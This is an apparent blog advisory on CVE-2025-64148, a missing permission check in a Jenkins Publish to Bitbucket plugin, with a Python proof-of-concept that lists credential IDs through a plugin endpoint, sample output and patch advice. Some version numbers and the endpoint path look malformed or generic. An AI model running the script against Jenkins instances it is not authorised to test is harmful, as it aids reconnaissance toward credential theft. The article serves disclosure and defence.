CVE-2025-64148 - Exploiting a Missing Permission Check in Jenkins Publish to Bitbucket Plugin

CVE-2025-64148 is a recently discovered security vulnerability in the Jenkins Publish to Bitbucket Plugin, affecting version .4 and earlier. This flaw arises from a missing permission check, enabling attackers with minimal privileges (just Overall/Read permission) to enumerate the IDs of credentials stored in Jenkins. While credentials IDs alone are not passwords or secrets, enumerating them can be leveraged in further attacks, including credential stuffing, phishing, or privilege escalation in Jenkins environments.

This article walks you through CVE-2025-64148: what it is, how it may be exploited, code snippets, and protections you can apply right now.

What is Jenkins Publish to Bitbucket Plugin?

The Jenkins Publish to Bitbucket Plugin automates publishing build artifacts or other files to Bitbucket from a Jenkins job. Typically, this process requires credentials—like API keys, user/password, or tokens—stored securely in the Jenkins credentials store. Plugins like this should carefully check permissions before exposing any information about stored credentials.

The Issue

Jenkins access control divides permissions into fine-grained categories. Overall/Read is the very basic level: any logged-in user on a Jenkins instance typically has this by default. The plugin, however, fails to verify if the caller has credentials/use permissions before providing a list of credentials IDs—information not meant for low-privileged users.

What’s the Risk?

- Enumeration: Attackers can view the IDs of credentials, which may include descriptive names or other information useful for crafting targeted attacks.
- Social Engineering: Knowing the names or purposes of credentials, attackers may launch convincing phishing attempts.
- Preparation for Further Exploits: With credential IDs, attackers might attempt to use other flaws to read the actual secret values.

How the Exploit Works

The endpoint exposed by the plugin responds to unauthorized requests with a list of all available credentials IDs.

Sample Exploit Code (Python 3)

This script demonstrates how an attacker with valid Jenkins login and Overall/Read access can harvest credentials IDs from a vulnerable Jenkins instance:

import requests
from requests.auth import HTTPBasicAuth

JENKINS_URL = 'http://your-jenkins.local';
USERNAME = 'lowprivuser'
PASSWORD = 'password'
PLUGINS_ENDPOINT = '/jenkins/job/your-job/publishBitbucket/credentials'

def get_credentials_ids():
    url = JENKINS_URL + PLUGINS_ENDPOINT
    resp = requests.get(url, auth=HTTPBasicAuth(USERNAME, PASSWORD))
    if resp.status_code == 200:
        print("Credentials IDs found:")
        print(resp.text)  # Output may be in JSON or HTML, depending on the plugin version
    else:
        print("Failed to access credentials endpoint. Status code:", resp.status_code)

get_credentials_ids()

Note: Replace the placeholders with valid values for your Jenkins setup.

Suppose the vulnerable endpoint returns something like

[
  {"id": "dev-bitbucket-token", "description": "Developer Bitbucket API token"},
  {"id": "deploy-prod", "description": "Production deploy credentials"}
]

Here, you’ve just learned the IDs and purpose of each credential on the system!

Responsible Disclosure and References

This vulnerability was responsibly disclosed to the Jenkins security team and has been tracked as CVE-2025-64148.

- Original Jenkins Security Advisory
- NVD CVE-2025-64148 Entry
- Publish to Bitbucket Plugin Page

Mitigation

Patch Immediately:
Upgrade the Publish to Bitbucket Plugin to the latest available version (.5 or above). The maintainers have added proper permission checks to prevent unauthorized disclosure of credential IDs.

Reduce Exposed Permissions:
Until you're able to update, restrict access to Jenkins and limit what even authenticated users can see.

Audit Credential Usage:
Review and rename credentials to avoid revealing sensitive details in IDs or descriptions.

Conclusion

*CVE-2025-64148* reminds us that even minor oversights—like missing a permission check—can open doors for attackers to gather valuable intelligence in your CI/CD infrastructure. Keeping Jenkins and its plugins updated, alongside routine access audits, will help you keep your automation environment safe.

Do you run Jenkins? Update now and check your plugin settings!

Timeline

Published on: 10/29/2025 13:29:51 UTC
Last modified on: 11/04/2025 22:16:41 UTC